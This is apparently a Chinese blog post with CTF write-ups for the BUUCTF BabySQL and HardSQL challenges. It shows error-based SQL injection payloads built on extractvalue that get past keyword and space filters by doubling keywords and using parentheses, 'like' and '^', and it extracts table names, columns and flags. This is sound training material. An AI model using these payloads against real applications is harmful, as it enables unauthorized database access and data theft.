buuctf BabySQL+HardSQL

最新推荐文章于 2024-06-18 16:59:41 发布
最新推荐文章于 2024-06-18 16:59:41 发布
阅读量3.8k 收藏 1
点赞数
文章标签: 网络 安全 php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45441315/article/details/121441114
版权

buuctf BabySQL

1、进入登录页面在这里插入图片描述

2、随便输入
在这里插入图片描述

发现用户名和密码错误
在这里插入图片描述
3、尝试判断是否为字符型注入
在这里插入图片描述
根据报错,确定为单引号字符型注入,密码处也尝试了一下,发现也是单引号字符型注入,说明有2处注入漏洞
在这里插入图片描述
4、尝试万能密码
1’ or 1=1-- 在这里插入图片描述

发现or被过滤了
在这里插入图片描述
尝试双写or
在这里插入图片描述
成功绕过
这里说下双写or为什么可以绕过
因为这个网页只对or进行一次过滤,即将字符串中的or替换为空,但是我们可以双写or去绕过,我们也可以用||去代替or
在这里插入图片描述
但是发现这个密码并没有用

5、测试有哪些关键字被过滤
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现select被过滤

继续测试and,substr,from这些都被过滤了

6、开始爆数据,知道怎么绕过了,后面就很简单了

爆表:

'|| extractvalue(0x7e,concat('~',database())) --

在这里插入图片描述

爆数据库:

'|| extractvalue(0x7e,concat('~',(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema=database()))) --

在这里插入图片描述
爆列

'|| extractvalue(0x7e,concat('~',(selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_schema=database() anandd table_name='b4bsql'))) --

在这里插入图片描述
爆数据

'|| extractvalue(0x7e,concat('~',(selselectect passwoorrd frofromm b4bsql limit 7,1))) --

爆到第7列发现flag,也可以使用burp的intruder来进行爆破数据
在这里插入图片描述
发现flag被截断,使用substr查看后面被截断的flag
mysql substr() 函数

'|| extractvalue(0x7e,concat('~',(selselectect susubstrbstr(passwoorrd,20) frofromm b4bsql limit 7,1))) --

在这里插入图片描述
将得到的flag组合即可得到flag
flag{09b6ece3-44fa-44a8-a97f-540c9efd1808}

buuctf HardSQL

经过测试and,空格,-,=,|,&都被黑名单了,但是extractvalue没有被过滤,所以我们可以使用xpath报错
1、爆数据库
空格用括号代替,括号一定要有闭合,闭合内的语句要的是一个select语句、函数、字符串、列、表、库等等

1'or(extractvalue(1,concat(0x7e,database())))#


如果or也被过滤的话,可以用^异或符号

1'^extractvalue(1,concat(0x7e,database()))#

在这里插入图片描述

2、爆表
=用like替代

'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database()))))#

在这里插入图片描述
3、爆列

'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1'))))#

在这里插入图片描述
4、爆数据

'^extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1))))#

在这里插入图片描述
~flag{d970a5cf-8466-448d-8204-3a
substr被过滤,使用right查找被截断的字符串

'^extractvalue(1,concat(0x7e,right((select(password)from(H4rDsq1)),20)))#

在这里插入图片描述

~d-8204-3a349037756c}
破解后得到flag flag{d970a5cf-8466-448d-8204-3a349037756c}

硫酸超
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF逆向前八题
01-24
在本篇中,我们将探讨在BUUCTF储备赛中遇到的前八道逆向题目,通过这些题目来学习如何使用逆向工具,如exeinfo和IDA,以及如何解析汇编代码以获取关键信息。 1. Easyre: 这道题首先使用exeinfo查看文件信息,确认...
BasicASM.s(BUUCTF
06-04
分析过程文件
BUUCTF [极客大挑战 2019]BabySQL
qq_52999628的博客
08-16 915
今天来做一道sql注入题,做这类题之前一直没有什么头绪,经常是各种常用的语句胡乱注入一通,所以这次想来完整记录一下整体思路,以供以后参考。 首先输入1'
buuctf-[极客大挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5118
buuctf-[极客大挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
BUUCTF [极客大挑战 2019] HardSQL 1
最新发布
m0_74167420的博客
06-18 206
原因:在输入' 或者 # 号时,'会被识别出来过滤掉,#会注释掉后面的内容,因此要进行url编码。在该题目中,双写被过滤掉了,同时空格,=,union也被过滤了。或者, payload为: 用 ^ 符号代替 or。1、阅读题目,是SQL注入的题目类型。2、尝试万能密码和堆叠注入,均被过滤。
buuctf-[极客大挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 3028
buuctf-[极客大挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
BUUCTF [web专项25][极客大挑战 2019]HardSQL
yanglinchiji的博客
11-05 267
right(password,32) (可以换成30,因为后面还有个}和~,32只是因为没有影响就没改)尝试报错注入(datexml和extractvalue两种,但是我看别人的wp都有,挺全的)那就用^代替and,用()代替空格,like代替等于号(如果还有需要代替的后面再说)发现这次过滤的很全,万能密码没有一个可以使用。经过测试,至少and,空格,等于 等被过滤。我们可以用right函数来获取后面的字符。发现只有一半,因为只能输出32字符。老常客了,进入后先用万能密码试试。拼凑即可获得flag。
BUUCTFHardSQL[极客大挑战 2019]
金 帛的博客
06-06 1325
buucft记录贴
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF详细解析,你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分,
BUUCTF部分web题目
05-06
### BUUCTF部分Web题目分析 #### WMCTF2020 Make PHP Great Again **题目背景**: 这道题目主要是考察PHP中的`require_once()`函数的使用以及如何利用符号链接来读取文件。 **核心知识点**: 1. **`require_once()...
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2025
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
web buuctf [极客大挑战 2019]HardSQL1
weixin_44214568的博客
03-15 1968
这题做了一下午,后来翻了一下别人的wp才发现,过滤了空格,服了。。 考点:报错注入 报错注入的应用是sql注入,页面无显示位,但有数据库的报错信息 报错注入使用函数(updatexml(xml_taget,xpath,new_xml)),这个函数是用来更新指定的xml文件,xpath的格式通常是为xx/xx/xx,传进去字符串就会报错,也就会显示报错信息, 利用updatexml(1,concat(0x7e,database()),2) concat函数将里面内容连成字符串,与xpath的格式不符
Bad sql- sql语法问题
weixin_40786663的博客
01-22 501
java.lang.RuntimeException: org.springframework.jdbc.BadSqlGrammarException: \n### Error querying database. Cause: java.sql.SQLSyntaxErrorException: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for
BUUCTF----[极客大挑战 2019]HardSQL
woshicainiao666的博客
03-09 554
报错注入updatexml()
BUUCTF---web---[极客大挑战 2019]HardSQL
2201_75556700的博客
05-19 781
7、 太可恶了,只爆出了一半,问题不大,我们使用right()函数,爆出password的 ,一般flag的长度为32位,加上前面爆出了大概有二十来个,继续爆右边大概15个就可以凑完整,不放心的话,可以爆长点。2、使用万能密码发现不可以,这种题前面有很多,这道题用前面的绕过方法不行,得换一种前面没有用过的方法,最近刚学了报错注入,前面就没有用这个方法,这里试试。查阅资料后发现需要构造下面的方法 and用^替换,#用%23替换,空格用()替换。4、用类似的方法查表名:这里注意=用like替换。
buuctf-HardSQL
m0_62094846的博客
04-02 1400
这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue 用报错注入 查库名(geek) ?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1 查找所有数据库 ?username=admin'or(updatexml(1,concat(0x7e,(select(grou...
BUUCTF [极客大挑战 2019]HardSQL
m0_63253040的博客
03-28 2399
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
buuctf+lovesql+++sqlmap
11-29
SQLMAP是一款开源的渗透测试工具,用于检测和利用SQL注入漏洞。它可以自动化地检测和利用SQL注入漏洞,并且可以获取数据库服务器的完整权限。下面是使用SQLMAP查看数据中的列表和字段的方法: ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值